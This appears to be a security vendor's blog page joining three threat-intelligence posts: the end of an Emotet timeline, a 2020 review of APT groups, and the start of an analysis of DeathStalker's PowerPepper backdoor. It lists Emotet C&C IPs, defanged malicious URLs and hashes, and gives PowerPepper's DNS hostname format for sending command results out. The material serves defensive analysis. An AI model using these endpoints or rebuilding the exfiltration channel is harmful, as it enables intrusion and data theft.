New functions in service.exe for saving Emotet to disk and running it

July

An update to the Emotet load module was distributed over the botnet. One notable change: Emotet had dropped GET requests with data transfer in the Cookie field of the HTTP header. Henceforth, all C&C communication used POST (MD5: 643e1f4c5cbaeebc003faee56152f9cb).

August

Network Spreader is included in the Emotet “distribution kit” as a DLL (MD5: 9c5c9c4f019c330aadcefbb781caac41), the compilation date of the new module is July 24, 2017, but it was obtained only in August. Recall that it used to be a self-extracting RAR archive with two files: bypass.exe and service.exe. The distribution mechanism did not change much, but the list of brute-force passwords was expanded significantly to exactly 1,000.

Screenshot of the decrypted password list

November

In November 2017, IBM X-Force published a report about the new IcedId banker. According to the researchers, Emotet had been observed spreading it. We got our hands on the first IcedId sample (MD5: 7e8516db16b18f26e504285afe4f0b21) in April, and discovered back then that it was wrapped in a cryptor also used in Emotet. The cryptor was not just similar, but a near byte-for-byte copy of the one in the Emotet sample (MD5: 2cd1ef13ee67f102cb99b258a61eeb20), which was being distributed at the same time.

2018 January

Emotet started distributing the banking Trojan Panda (Zeus Panda, first discovered in 2016 and based on the leaked Zbot banker source code, carries out man-in-the-browser attacks and intercepts keystrokes and input form content on websites).

April April 9

In early April, Emotet acquired a module for distribution over wireless networks (MD5: 75d65cea0a33d11a2a74c703dbd2ad99), which tried to access Wi-Fi using a dictionary attack. Its code resembled that of the Network Spreader module (bypass.exe), which had been supplemented with Wi-Fi connection capability. If the brute-force was successful, the module transmitted data about the network to C&C.

Like bypass.exe, the module was distributed as a separate file (a.exe) inside a self-extracting archive (MD5: 5afdcffca43f8e7f848ba154ecf12539). The archive also contained the above-described service.exe (MD5: 5d6ff5cc8a429b17b5b5dfbf230b2ca4), which, like its first version, could do nothing except send the name of the infected computer to C&C.

Self-extracting RAR archive with a component for distribution over Wi-Fi

The cybercriminals quickly updated the module, and within a few hours of detecting the first version we received an updated self-extracting archive (MD5: d7c5bf24904fc73b0481f6c7cde76e2a) containing a new service.exe with Emotet inside (MD5: 26d21612b676d66b93c51c611fa46773).

Self-extracting RAR archive with updated service.exe

The module was first publicly described only in January 2020, by Binary Defense. The return to the old distribution mechanism and the use of code from old modules looked a little strange, since back in 2017 bypass.exe and service.exe had been merged into one DLL module.

April 14

Emotet again started using GET requests with data transfer in the Cookie field of the HTTP header for data transfer sizes of less than 1 KB simultaneously with POST requests for larger amounts of data. (MD5: 38991b639b2407cbfa2e7c64bb4063c4). Also different was the template for filling the Cookie field. If earlier it took the form Cookie: %X=, now it was Cookie: %u =. The newly added space between the numbers and the equals sign helped to identify Emotet traffic.

Example of a GET request

April 30

The C&C servers suspended their activity and resumed it only on May 16, after which the space in the GET request had gone.

Example of a corrected GET request

June

Yet another banking Trojan started using Emotet to propagate itself. This time it was Trickster (or Trickbot) — a modular banker known since 2016 and the successor to the Dyreza banker.

July

The so-called UPnP module (MD5: 0f1d4dd066c0277f82f74145a7d2c48e), based on the libminiupnpc package, was obtained for the first time. The module enabled port forwarding on the router at the request of a host in the local network. This allowed the attackers not only to gain access to local network computers located behind NAT, but to turn an infected machine into a C&C proxy.

August

In August, there appeared reports of infections by the new Ryuk ransomware — a modification of the Hermes ransomware known since 2017. It later transpired that the chain of infection began with Emotet, which downloaded Trickster, which in turn installed Ryuk. Both Emotet and Trickster by this time had been armed with functions for distribution over a local network, plus Trickster exploited known vulnerabilities in SMB, which further aided the spread of the malware across the local network. Coupled with Ryuk, it made for a killer combination.

At the end of the month, the list of passwords in the Network Spreader module was updated. They still numbered 1,000, but about 100 had been changed (MD5: 3f82c2a733698f501850fdf4f7c00eb7).

Screenshot of the decrypted password list

October October 12

The C&C servers suspended their activity while we registered no distribution of new modules or updates. Activity resumed only on October 26.

October 30

The data exfiltration module for Outlook (MD5:64C78044D2F6299873881F8B08D40995) was updated. The key innovation was the ability to steal the contents of the message itself. All the same, the amount of stealable data was restricted to 16 KB (larger messages were truncated).

Comparison of the code of the old and new versions of the data exfiltration module for Outlook

November

The C&C servers suspended their activity while we registered no distribution of new modules or updates. Activity resumed only on December 6.

December

More downtime while C&C activity resumed only on January 10, 2019.

2019 March March 14

Emotet again modified a part of the HTTP protocol, switching to POST requests and using a dictionary to create the path. The Referer field was now filled, and Content-Type: multipart/form-data appeared.  (MD5: beaf5e523e8e3e3fb9dc2a361cda0573)

Code of the POST request generation function

Example of a POST request

March 20

Yet another change in the HTTP part of the protocol. Emotet dropped Content-Type: multipart/form-data. The data itself was encoded using Base64 and UrlEncode (MD5: 98fe402ef2b8aa2ca29c4ed133bbfe90).

 

Code of the updated POST request generation function

Example of a POST request

April

The first reports appeared that information stolen by the new data exfiltration module for Outlook was being used in Emotet spam mailings: the use of stolen topics, mailing lists and message contents was observed in emails.

May

The C&C servers stopped working for quite some time (three months). Activity resumed only on August 21, 2019. Over the following few weeks, however, the servers only distributed updates and modules with no spam activity being observed. The time was likely spent restoring communication with infected systems, collecting and processing data, and spreading over local networks.

November

A minor change to the HTTP part of the protocol. Emotet dropped the use of a dictionary to create the path, opting for a randomly generated string (MD5: dd33b9e4f928974c72539cd784ce9d20).

Example of a POST request

February February 6

Yet another change in the HTTP part of the protocol. The path now consisted not of a single string, but of several randomly generated words. Content-Type again became multipart/form-data.

Example of a POST request

Along with the HTTP part, the binary part was also updated. The encryption remained the same, but Emotet dropped Google Protocol Buffer and switched to its own format. The compression algorithm also changed, with zlib replaced by liblzf. More details about the new protocol can be found in the Threat Intel and CERT Polska reports.

February 7

C&C activity started to decline and resumed only in July 2020. During this period, the amount of spam fell to zero. At the same time, Binary Defense, in conjunction with various CERTs and the infosec community, began to distribute EmoCrash, a PowerShell script that creates incorrect values ​for system registry keys used by Emotet. This caused the malware to “crash” during installation. This killswitch worked until August 6, when the actors behind Emotet patched the vulnerability.

July

Only a few days after the resumption of spam activity, online reports appeared that someone was substituting the malicious Emotet payload on compromised sites with images and memes. As a result, clicking the links in spam emails opened an ordinary picture instead of a malicious document. This did not last long, and by July 28 the malicious files had stopped being replaced with images.

Conclusion

Despite its ripe old age, Emotet is constantly evolving and remains one of the most current threats out there. Save for the explosive growth in distribution after five months of inactivity, we have yet to see anything previously unobserved; that said, a detailed analysis always takes time, and we will publish the results of the study in due course. On top of that, we are currently observing the evolution of third-party malware that propagates using Emotet, which we will certainly cover in future reports.

Our security solutions can block Emotet at any stage of attack. The mail filter blocks spam, the heuristic component detects malicious macros and removes them from Office documents, while the behavioral analysis module makes our protection system resistant not only to statistical analysis bypass techniques, but to new modifications of program behavior as well.

To mitigate the risks, it is vital to receive accurate, reliable, before-the-fact information about all information security matters. Scanning IP addresses, file hashes and domains/URLs on opentip can determine if an object poses a genuine threat based on risk levels and additional contextual information. Analyzing files with opentip, using our proprietary technologies, including dynamic, statistical and behavioral analysis, as well as our global reputation system, can help detect advanced mass and latent threats.

And Kaspersky Threat Intelligence is there to track constantly evolving cyberthreats, analyze them, respond to attacks in good time, and minimize the consequences.

IOC Most active C&Cs in November 2020:

173.212.214.235:7080
167.114.153.111:8080
67.170.250.203:443
121.124.124.40:7080
103.86.49.11:8080
172.91.208.86:80
190.164.104.62:80
201.241.127.190:80
66.76.12.94:8080
190.108.228.27:443

Links to Emotet extracted from malicious documents

hxxp://tudorinvest[.]com/wp-admin/rGtnUb5f/
hxxp://dp-womenbasket[.]com/wp-admin/Li/
hxxp://stylefix[.]co/guillotine-cross/CTRNOQ/
hxxp://ardos.com[.]br/simulador/bPNx/
hxxps://sangbadjamin[.]com/move/r/
hxxps://asimglobaltraders[.]com/baby-rottweiler/duDm64O/
hxxp://sell.smartcrowd[.]ae/wp-admin/CLs6YFp/
hxxps://chromadiverse[.]com/wp-content/OzOlf/
hxxp://rout66motors[.]com/wp-admin/goi7o8/
hxxp://caspertour.asc-florida[.]com/wp-content/gwZbk/

MD5s of malicious Office documents downloading Emotet

59d7ae5463d9d2e1d9e77c94a435a786
7ef93883eac9bf82574ff2a75d04a585
4b393783be7816e76d6ca4b4d8eaa14a

MD5s of Emotet executable files

4c3b6e5b52268bb463e8ebc602593d9e
0ca86e8da55f4176b3ad6692c9949ba4
8d4639aa32f78947ecfb228e1788c02b
28df8461cec000e86c357fdd874b717e
82228264794a033c2e2fc71540cb1a5d
8fc87187ad08d50221abc4c05d7d0258
b30dd0b88c0d10cd96913a7fb9cd05ed
c37c5b64b30f2ddae58b262f2fac87cb
3afb20b335521c871179b230f9a0a1eb
92816647c1d61c75ec3dcd82fecc08b2

2020. december 3.

APT annual review: What the world’s threat actors got up to in 2020

We track the ongoing activities of more than 900 advanced threat actors; you can find our quarterly overviews here, here and here. Here we try to focus on what we consider to be the most interesting trends and developments of the last 12 months. This is based on our visibility in the threat landscape; and it’s important to note that no single vendor has complete visibility into the activities of all threat actors.

Beyond Windows

While Windows continues to be the main focus for APT threat actors, we have observed a number of non-Windows developments this year. Last year we reported a malware framework called MATA that we attribute to Lazarus. This framework included several components such as a loader, orchestrator and plug-ins. In April, we learned that MATA extended beyond Windows and Linux to include macOS. The malware developers Trojanized an open-source two-factor authentication application and utilized another open-source application template. The MATA framework was not the only way that Lazarus targeted macOS. We found a cluster of activity linked to Operation AppleJeus. We also discovered malware similar to the macOS malware used in a campaign that we call TangDaiwbo – a multi-platform cryptocurrency exchange campaign. Lazarus utilizes macro-embedded Office documents and spreads PowerShell or macOS malware, depending on the victim’s system.

Kaspersky has publicly documented the Penquin family, tracing it back to its Unix ancestors in the Moonlight Maze operation of the 1990s. When researchers at Leonardo published a report in May about Penquin_x64, a previously undocumented variant of Turla’s Penquin GNU/Linux backdoor, we followed up on this latest research by generating network probes that detect Penquin_x64-infected hosts at scale, allowing us to discover that tens of internet hosting servers in Europe and the US are still compromised today. We think it’s possible that, following public disclosure of Turla’s GNU/Linux tools, the Turla threat actor may have been repurposing Penquin to conduct operations other than traditional intelligence.

In our 2020 Q3 APT trends report we described a campaign we dubbed TunnelSnake. By analyzing the activity in this campaign, we were able to uncover the network discovery and lateral movement toolset used by the threat actor after deploying the Moriya rootkit. We saw that the actor also made use of the open-source tools Earthworm and Termite, capable of spawning a remote shell and tunneling traffic between hosts. These tools are capable of operating on multiple architectures widely used by IoT devices, demonstrating a readiness to pivot to such devices.

Infecting UEFI firmware

During an investigation of a targeted campaign, we found a UEFI firmware image containing rogue components that drop previously unknown malware to disk. Our analysis showed that the revealed firmware modules were based on a known bootkit named Vector-EDK, and the dropped malware was a downloader for further components. By pivoting on unique traits of the malware, we uncovered a range of similar samples from our telemetry that have been used against diplomatic targets since 2017 and that have different infection vectors. While the business logic of most of them is identical, we saw that some had additional features or differed in their implementation. Because of this, we infer that the bulk of samples originate from a bigger framework, which we dubbed MosaicRegressor. The targets, diplomatic entities and NGOs in Asia, Europe and Africa, all appear to be connected in some way to North Korea.

Mobile implants

The use of mobile implants by APT threat actors is no longer a novelty: this year we have observed various groups targeting mobile platforms.

In January, we discovered a watering hole utilizing a full remote iOS exploit chain. The site appears to have been designed to target users in Hong Kong, based on the content of the landing page. While the exploits currently being used are known, the actor responsible is actively modifying the exploit kit to target more iOS versions and devices. We observed the latest modifications on February 7. The project is broader than we initially thought, supporting an Android implant, and probably implants for Windows, Linux and macOS. We have named this APT group TwoSail Junk. We believe this is a Chinese-speaking group; it maintains infrastructure mostly within Hong Kong, along with a couple of hosts located in Singapore and Shanghai. TwoSail Junk directs visitors to its exploit site by posting links within the threads of forum discussions, or creating new topic threads of their own. To date, dozens of visits were recorded from within Hong Kong, with a couple from Macau. The technical details around the functionality of the iOS implant, called LightSpy, and related infrastructure, reveal a low-to-mid capable actor. However, the iOS implant is a modular and exhaustively functional iOS surveillance framework.

In August, we published the second of our reports on the recent activities of the Transparent Tribe threat actor. This included an Android implant used by the group to spy on mobile devices. One of the methods used to distribute the app was by disguising it as the Aarogya Setu COVID-19 tracking app developed by the government of India. The fake app was used to target military personnel in India; and, based on public information, may have been distributed by sending a malicious link via WhatsApp, SMS, email or social media.

In June, we observed a new set of malicious Android downloaders which, according to our telemetry, have been actively used in the wild since at least December 2019, and have been used in a campaign targeting victims almost exclusively in Pakistan. The authors spread the malware by mimicking Chat Lite, Kashmir News Service and other legitimate regional Android applications. A report by the National Telecom & Information Technology Security Board (NTISB) from January describes malware sharing the same C2s and spoofing the same legitimate apps. According to the publication, the targets were Pakistani military bodies, and the attackers used WhatsApp messages, SMS, emails and social media as the initial infection vectors. Our own telemetry shows that this malware also spreads through Telegram messenger. The analysis of the initial set of downloaders allowed us to find an additional set of Trojans that we believe are strongly related, as they use the package name mentioned in the downloaders and focus on the same targets. These new samples have strong code similarity with artefacts previously attributed to Origami Elephant.

Big game hunting

In April, we released an early warning about the VHD ransomware, which was first spotted in late March. This ransomware stood out because of its self-replication method. The use of a spreading utility compiled with victim-specific credentials was reminiscent of APT campaigns, but at the time we were unable to link the attack to an existing group. However, we were able to identify an incident in which the VHD ransomware was deployed, in close conjunction with known Lazarus tools, against businesses in France and Asia. This indicates that Lazarus is behind the VHD ransomware campaigns that have been documented so far. As far as we know, this is the first time it has been established that the Lazarus group has resorted to targeted ransomware attacks (known as “big game hunting”) for financial gain.

Continued use of ‘naming and shaming’

Some years ago, we predicted that governments would resort to the “court of public opinion” as a strategy to draw attention to the activities of hostile APT groups; and this trend has developed further in the last year or so.

In February, the US Department of Justice (DoJ) charged four Chinese military officers with computer fraud, economic espionage and wire fraud for hacking into the credit reporting agency Equifax in 2017. The following month, the DoJ charged two Chinese nationals with laundering more than $100 million in cryptocurrency on behalf of North Korea. The indictment alleged that the two men laundered cryptocurrency stolen by North Korean hackers between December 2017 and April 2019, helping to hide the stolen currency from police.

In May, the UK National Cyber Security Centre (NCSC) and the US Department of Homeland Security (DHS) issued a joint advisory warning that both countries are investigating a number of incidents in which other nation states are targeting pharmaceutical companies, medical research organizations and universities, looking for intelligence and sensitive data, including research on COVID-19. The FBI and CISA (Cybersecurity and Infrastructure Security Agency) also issued a warning that threat actors related to the People’s Republic of China have been targeting US organizations engaged in COVID-19-related research.

On July 30, the European Council announced that it was imposing sanctions against six individuals and three entities that it believes are responsible for, or involved in, various cyberattacks, including the attempted attack on the Organisation for the Prohibition of Chemical Weapons (OPCW) and the WannaCry, NotPetya and Operation Cloud Hopper attacks. The sanctions include a travel ban and asset freeze. In addition, EU persons and entities are forbidden from making funds available to those listed.

In September, the US DoJ released three indictments associated with hackers allegedly connected with APT41 and other intrusions tracked as Barium, Winnti, Wicked Panda and Wicked Spider. In addition, two Malaysian nationals were also arrested on September 14, in Sitiawan (Malaysia), for “conspiring to profit from computer intrusions targeting the video game industry”, following cooperation between the US DoJ and Government of Malaysia, including the Attorney General’s Chambers of Malaysia and the Royal Malaysia Police. The indictments contain several indirect IoCs, which allowed us to connect these intrusions to Operation ShadowPad and Operation ShadowHammer, two massive supply-chain attacks that we discovered and investigated.

In October, the US DoJ indicted six Russian military intelligence officers for a number of cyberattacks, including NotPetya, the Olympic Destroyer attacks on the 2018 Winter Olympics and attacks affecting France, Georgia, the Netherlands, Ukraine and the investigation into the 2018 Novichok poisonings in the UK. The UK NCSC also accused Russia’s GRU military intelligence service of attacks on officials and organizations involved in the 2020 Tokyo games, prior to their postponement.

‘Good enough’ is enough

The malware developed by APT threat actors doesn’t always need to be technically sophisticated in order to be effective. The activities of DeathStalker illustrates this. This is a unique threat actor that seems to focus mainly on law firms and companies operating in the financial sector. The group’s interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as an information broker in financial circles. The activities of this threat actor first came to our attention through a PowerShell-based implant called Powersing. This quarter, we unraveled the threads of DeathStalker’s LNK-based Powersing intrusion workflow. The group continues to develop and use this implant, employing tactics that have mostly been identical since 2018, while making greater efforts to evade detection. In August, our public report of DeathStalker’s activities summarized the three scripting language-based toolchains used by the group – Powersing, Janicab and Evilnum.

Following our initial private report on Evilnum, we detected a new batch of implants in late June 2020, showing interesting changes in the (so far) quite static modus operandi of DeathStalker. For instance, the malware directly connects to a C2 server using an embedded IP address or domain name, as opposed to previous variants where it made use of at least two dead drop resolvers (DDRs) or web services, such as forums and code sharing platforms, to fetch the real C2 IP address or domain. Interestingly, for this campaign the attackers didn’t limit themselves merely to sending spear-phishing emails, but actively engaged victims through multiple emails, persuading them to open the decoy to increase the chances of compromise. Furthermore, aside from using Python-based implants throughout the intrusion cycle, in both new and old variants, this was the first time that we had seen the actor dropping PE binaries as intermediate stages to load Evilnum, while using advanced techniques to evade and bypass security products.

We also found another intricate, low-tech implant used since Q2 2020 that we attribute with high confidence to DeathStalker. The delivery workflow uses a Microsoft Word document and drops a previously unknown PowerShell implant that relies on DNS over HTTPS (DoH) as a C2 channel. We dubbed this implant PowerPepper. In October 2020, we identified new samples of DeathStalker’s PowerPepper toolset, containing improvements that included improved sandbox detection techniques. The group also leveraged a new infection chain to deliver PowerPepper.

DeathStalker offers a good example of what small groups or even skilled individuals can achieve, without the need for innovative tricks or sophisticated methods. DeathStalker should serve as a baseline of what organizations in the private sector should be able to defend against, since groups of this sort represent the type of cyberthreat that companies today are most likely to face. We advise defenders to pay close attention to any process creation related to native Windows interpreters for scripting languages, such as powershell.exe and cscript.exe: wherever possible, these utilities should be made unavailable. Security awareness training and security product assessments should also include infection chains based on LNK files.

Exploiting COVID-19

In the wake of the COVID-19 pandemic, and the lockdowns imposed by many countries in response, attackers of all kinds sought to capitalize on people’s fears about the disease. Most of the phishing scams related to COVID-19 have been launched by cybercriminals using the disease as a springboard to make money. However, the list of attackers also includes APT threat actors such as Lazarus, Sidewinder, Transparent Tribe, GroupA21, which we observed using COVID-19-themed lures to target their victims, as well as Kimsuky, APT27, IronHusky and ViciousPanda who did the same, according to OSINT (open source intelligence). In March, we discovered a suspicious infrastructure that could have been used to target health and humanitarian organizations, including the WHO. We weren’t able to firmly attribute this to any specific actor, and it was registered before the COVID-19 crisis. Some private sources suggested it might be related to DarkHotel.

A few months later, there were a series of attacks on supercomputing centers around Europe, including the UK-based ARCHER, the German-based bwHPC and the Swiss National Supercomputing Centre. The EGI Computer Security and Incident Response Team (EGI-CSIRT) also published an alert in May covering two incidents that, according to its report, may or may not be related. Although we weren’t able to establish with a high degree of certainty that the ARCHER hack and the incidents described by EGI-CSIRT are related, we suspect they might be. Some media speculated that all these attacks might be related to COVID-19 research being carried out at the supercomputing centers.

Following publication of our initial report on WellMess (see our APT trends report Q2 2020), the UK National Cyber Security Centre (NCSC) released a joint advisory, along with the Canadian and US governments, on the most recent activity involving WellMess. Specifically, all three governments attribute the use of this malware targeting COVID-19 vaccine research to The Dukes (aka APT29 and Cozy Bear). While the publication of the NCSC advisory increased general public awareness on the malware used in these recent attacks, the attribution statements made by all three governments provided no clear evidence for other researchers to pivot on for confirmation. For this reason, we still assess that the WellMess activity has been conducted by a previously unknown threat actor.

We do not believe that the interest of APT threat actors in COVID-19 represents a meaningful change in terms of TTPs (Tactics Techniques and Procedures): they’re simply using it as a newsworthy topic to lure their victims.

Final thoughts

We will continue to track the activities of APT threat actors and will regularly highlight the most interesting findings. However, if you wish to learn more about what the world’s most sophisticated threat groups get up to, please reach out to us at intelreports@kaspersky.com.

2020. december 3.

What did DeathStalker hide between two ferns?

DeathStalker is a threat actor who has been active starting 2012 at least, and we exposed most of his past activities in a previous article, as well as during a GREAT Ideas conference in August 2020. The actor draught our attention in 2018, because of distinctive attacks characteristics that did not fit the usual cybercrime or state-sponsored activities, making us believe that DeathStalker is a “hack-for-hire” company.

DeathStalker leveraged several malware strains and delivery chains across years, from the Python and VisualBasic-based Janicab, to the PowerShell-based Powersing, passing by the JavaScript-based Evilnum. The actor consistently used what we call “dead-drop resolvers” (DDRs), which are some obfuscated content hosted on major public Web services like YouTube, Twitter or Reddit; and which once decoded by a malware would reveal a command-and-control (C2) server address. DeathStalker also consistently leveraged anti-detection and antivirus evasion techniques, as well as intricated delivery chains, that would drop lots of files on target’s filesystems. To kick-start an infection, DeathStalker usually relies on spear-phishing emails with attachments, or links to public file-sharing services, as well as Windows shortcuts-based script execution. We have identified DeathStalker’s malware compromises within clusters or varied targets in all parts of the world, with a possible focus on law and consultancy offices, as well as FINTECH companies, but without any clear or stable visible interest. The targeting does not seem to be politically or strategically defined and does not fit in usual financially motived crime. As so, we concluded that DeathStalker is a cyber-mercenaries organization.

While tracking DeathStalker’s Powersing-based activities in May 2020, we detected a previously unknown implant that leveraged DNS over HTTPS as a C2 channel, as well as parts of its delivery chain. We named this new malware “PowerPepper”. We first spotted a variant of PowerPepper in the wild in mid-July 2020, as dropped from a Word Document that had been submitted on a public multiscanner service. PowerPepper implant and associated delivery chain has been continuously developed and operated since.

Meet PowerPepper: the spicy implant that your bland scripts setup needed PowerPepper implant

PowerPepper is a Windows in-memory PowerShell backdoor that can execute remotely sent shell commands. In strict accordance with DeathStalker’s traditions, the implant will try to evade detection with various tricks like mouse movements detection, client’s MAC addresses filtering, Excel application handling and antivirus products inventory.

The implant’s C2 logic stands out, as it is based on communications via DNS over HTTPS (DoH), using CloudFlare responders. PowerPepper first try to leverage Microsoft’s Excel as a Web client to send DoH requests to a C2 server, but will fall back to PowerShell’s standard Web client, and ultimately to regular DNS communications, if messages cannot go through.

C2 communications content between the implant and servers is encrypted. We noticed that PowerPepper and the previously described Powersing use an almost identical PowerShell implementation of AES encryption, with only the AES padding mode and a function input format being changed.

PowerPepper DNS command and control

PowerPepper regularly polls a C2 server for commands to execute. In order to do so, the implant sends TXT-type DNS requests (with DoH or plain DNS requests if the later fails) to the name servers (NS) that are associated with a malicious C2 domain name. If the target which runs the implant is validated (we cover that later), the server replies with a DNS response, embedding an encrypted command. Both requests and responses contain patterns that can be easily detected with network intrusion detection systems, but that has been changed across implants variants.

The commands execution results are sent back to the server through a batch of variable-length A-type DNS requests, where queried hostnames contain an identifier, data length, and encrypted data.

# Command result feedback initialization DNS request hostname: <identifier>.be.0.0.1.0.0.0.0.<domain> # Command result feedback data slices DNS requests hostnames: <identifier>.ef.1.0.1.3.BDA2ADBE3C79C9EF6630.DDD4B8D4504FEC348C9C.2F53BFB60C1890585CF7.<domain> <identifier>.ef.2.0.1.3.72DE8DDB802C4829B2DE.40CB7163E83DE0B4A002.6B6C2E555A931721A525.<domain> <identifier>.ef.3.0.1.2.1699380DBABAB113D32B.7869501E5FEDD524304B.0.<domain> # Command result feedback termination DNS request hostname: <identifier>.ca.4.0.1.00.0.0.0.<domain>

During the course of our investigations, we noticed that the PowerPepper C2 name servers were actually open DNS resolvers, that always resolved arbitrary hostnames with the same IP addresses: 128.49.4.4 (a US Navy owned server), 91.214.6.100 and 91.214.6.101 (HSBK UK owned servers). Using this fact and reverse DNS resolutions historical data, we have been able to preemptively identify PowerPepper C2 domains.

PowerPepper signaling and targets validation

On top of the DNS C2 communication logic, PowerPepper is also signaling successful implant startup and execution flow errors to a Python backend, through HTTPS. Such signaling enables targets validation and implant execution logging, while preventing researchers to further interact with PowerPepper malicious C2 name servers. It has also been used directly from some of the malicious documents that were involved in PowerPepper delivery, thought the remote-sources links feature in Office documents.

The signaling Python backends were hosted on a public and legitimate content hosting Web service which is named “PythonAnywhere“, and which allows users to build websites. Discovered Python backend endpoints were shut down by PythonAnywhere in coordination with us. As a result, DeathStalker tried to adapt the signaling feature by removing it from most PowerPepper delivery documents (but keeping it in the implant itself), and by adding a legitimate but compromised WordPress website as a reverse-proxy between implants and backends.

PowerPepper delivery chains: a surprising journey into mercenaries’ tricks, from Russian dolls to plant-covered steganography The macro-based delivery chain: when you are way too much into this whole “Russian dolls” idea

The first type of PowerPepper delivery (or infection) chain we encountered, back in July 2020, is based on a malicious Word document. Although we could not confirm how such document had been distributed to targets, infection trails and documents we analyzed would show tha